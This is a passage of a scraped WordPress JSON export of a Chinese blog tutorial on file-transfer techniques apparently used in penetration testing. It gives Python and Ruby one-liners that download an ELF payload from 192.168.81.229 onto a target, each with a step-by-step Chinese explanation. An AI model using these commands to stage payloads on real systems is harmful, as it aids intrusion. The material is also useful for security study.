                                                        2.Python<\/h2>\n
                                                        python3 -c "import urllib.request;u=urllib.request.urlopen('http:\/\/192.168.81.229\/6677.elf');f=open('c:\\\\temp\\\\win.hta','w');f.write(u.read().decode('utf-8'))"\n<\/code><\/pre>\n
                                                          \n
                                                        1. python3 -c<\/code><\/strong>:
                                                          \n\u4f7f\u7528 Python 3 \u6267\u884c\u540e\u9762\u5f15\u53f7\u4e2d\u7684\u5355\u884c\u4ee3\u7801\u3002<\/li>\n
                                                        2. import urllib.request<\/code><\/strong>:
                                                          \n\u5bfc\u5165 Python \u6807\u51c6\u5e93\u4e2d\u7684\u00a0urllib.request<\/code>\u00a0\u6a21\u5757\uff0c\u7528\u4e8e\u5904\u7406 HTTP \u8bf7\u6c42\u3002<\/li>\n
                                                        3. urllib.request.urlopen('http:\/\/192.168.81.229\/6677.elf')<\/code><\/strong>:
                                                          \n\u6253\u5f00\u6307\u5b9a\u7684 URL\uff08http:\/\/192.168.81.229\/6677.elf<\/code>\uff09\u5e76\u8fd4\u56de\u4e00\u4e2a\u6587\u4ef6\u5bf9\u8c61\u00a0u<\/code>\uff0c\u7528\u4e8e\u53d6\u8fdc\u7a0b\u6587\u4ef6\u5185\u5bb9\u3002<\/li>\n
                                                        4. open('c:\\\\temp\\\\win.hta', 'w')<\/code><\/strong>:
                                                          \n\u5728\u672c\u5730\u6253\u5f00\u6587\u4ef6\u00a0c:\\temp\\win.hta<\/code>\uff0c\u6a21\u5f0f\u4e3a\u5199\u5165\uff08'w'<\/code>\uff09\u3002\u5982\u679c\u6587\u4ef6\u4e0d\u5b58\u5728\uff0c\u5219\u4f1a\u521b\u5efa\u5982\u679c\u6587\u4ef6\u5df2\u5b58\u5728\uff0c\u5219\u4f1a\u8986\u76d6\u3002<\/li>\n
                                                        5. f.write(u.read().decode('utf-8'))<\/code><\/strong>:<\/li>\n<\/ol>\n
                                                            \n
                                                          • u.read()<\/code>\u00a0\u8bfb\u53d6\u8fdc\u7a0b\u6587\u4ef6\u7684\u5185\u5bb9\uff08\u4e8c\u8fdb\u5236\u6570\u636e\uff09\u3002<\/li>\n
                                                          • .decode('utf-8')<\/code>\u00a0\u5c06\u4e8c\u8fdb\u5236\u6570\u636e\u89e3\u7801\u4e3a UTF-8 \u5b57\u7b26\u4e32\u3002<\/li>\n
                                                          • f.write()<\/code>\u00a0\u5c06\u89e3\u7801\u540e\u7684\u5185\u5bb9\u5199\u5165\u672c\u5730\u6587\u4ef6\u3002<\/li>\n<\/ul>\n
                                                            python2 -c "import urllib2;u=urllib2.urlopen('http:\/\/192.168.81.229\/6677.elf');f=open('c:\\\\temp\\\\win.hta','w');f.write(u.read());f.close()"\n<\/code><\/pre>\n
                                                            3.Ruby<\/h2>\n
                                                            #!ruby\n#!\/usr\/bin\/ruby\nrequire 'net\/http'\nNet::HTTP.start("192.168.81.229") { |http| r = http.get("\/6677.elf")\n  open("\/tmp\/5555.elf", "wb") { |file| file.write(r.body)\n    }\n}\n<\/code><\/pre>\n
                                                              \n
                                                            1. #!\/usr\/bin\/ruby<\/code><\/strong>:
                                                              \n\u6307\u5b9a\u811a\u672c\u4f7f\u7528 Ruby \u89e3\u91ca\u5668\u6267\u884c\u3002<\/li>\n
                                                            2. require 'net\/http'<\/code><\/strong>:
                                                              \n\u5bfc\u5165 Ruby \u6807\u51c6\u5e93\u4e2d\u7684\u00a0net\/http<\/code>\u00a0\u6a21\u5757\uff0c\u7528\u4e8e\u5904\u7406 HTTP \u8bf7\u6c42\u3002<\/li>\n
                                                            3. Net::HTTP.start("192.168.81.229")<\/code><\/strong>:
                                                              \n\u542f\u52a8\u4e00\u4e2a HTTP \u4f1a\u8bdd\uff0c\u8fde\u63a5\u5230\u6307\u5b9a\u7684\u4e3b\u673a\uff08192.168.81.229<\/code>\uff09\u3002<\/li>\n
                                                            4. http.get("\/6677.elf")<\/code><\/strong>:
                                                              \n\u53d1\u9001 HTTP GET \u8bf7\u6c42\uff0c\u83b7\u53d6\u8def\u5f84\u4e3a\u00a0\/6677.elf<\/code>\u00a0\u7684\u6587\u4ef6\u5185\u5bb9\uff0c\u5e76\u5c06\u54cd\u5e94\u5b58\u50a8\u5728\u53d8\u91cf\u00a0r<\/code>\u00a0\u4e2d\u3002<\/li>\n
                                                            5. open("\/tmp\/5555.elf", "wb")<\/code><\/strong>:<\/li>\n<\/ol>\n
                                                                \n
                                                              • \u6253\u5f00\u672c\u5730\u6587\u4ef6\u00a0\/tmp\/5555.elf<\/code>\uff0c\u6a21\u5f0f\u4e3a\u4e8c\u8fdb\u5236\u5199\u5165\uff08"wb"<\/code>\uff09\u3002<\/li>\n
                                                              • \u5982\u679c\u6587\u4ef6\u4e0d\u5b58\u5728\uff0c\u5219\u4f1a\u521b\u5efa\uff1b\u5982\u679c\u6587\u4ef6\u5df2\u5b58\u5728\uff0c\u5219\u4f1a\u8986\u76d6\u3002<\/li>\n<\/ul>\n
                                                                  \n
                                                                1. file.write(r.body)<\/code><\/strong>:
                                                                  \n\u5c06 HTTP \u54cd\u5e94\u7684\u5185\u5bb9\uff08r.body<\/code>\uff09\u5199\u5165\u672c\u5730\u6587\u4ef6\u3002<\/li>\n<\/ol>\n
                                                                  ruby -e "require 'net\/http';Net::HTTP.start('192.168.81.229') { |http|r = http.get('\/6677.elf');open('\/tmp\/6677.elf', 'wb') { |file| file.write(r.body)}}"\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"
                                                                  \u4e00\u3001Windows\u4e0b\u6587\u4ef6\u4f20\u8f93 1.Bitsadmin BITSAdmin \u662f\u4e00\u4e2a\u547d\u4ee4\u884c\u5de5\u5177\uff0c\u53ef\u4ee5\u4f7f\u7528\u5b83\u521b\u5efa\u4e0b\u8f7d […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[55,9],"tags":[],"class_list":["post-1888","post","type-post","status-publish","format-standard","hentry","category-55","category-9"],"_links":{"self":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1888","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/comments?post=1888"}],"version-history":[{"count":1,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1888\/revisions"}],"predecessor-version":[{"id":1889,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/posts\/1888\/revisions\/1889"}],"wp:attachment":[{"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/media?parent=1888"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/categories?post=1888"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/gzxingyu.cloud\/index.php\/wp-json\/wp\/v2\/tags?post=1888"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}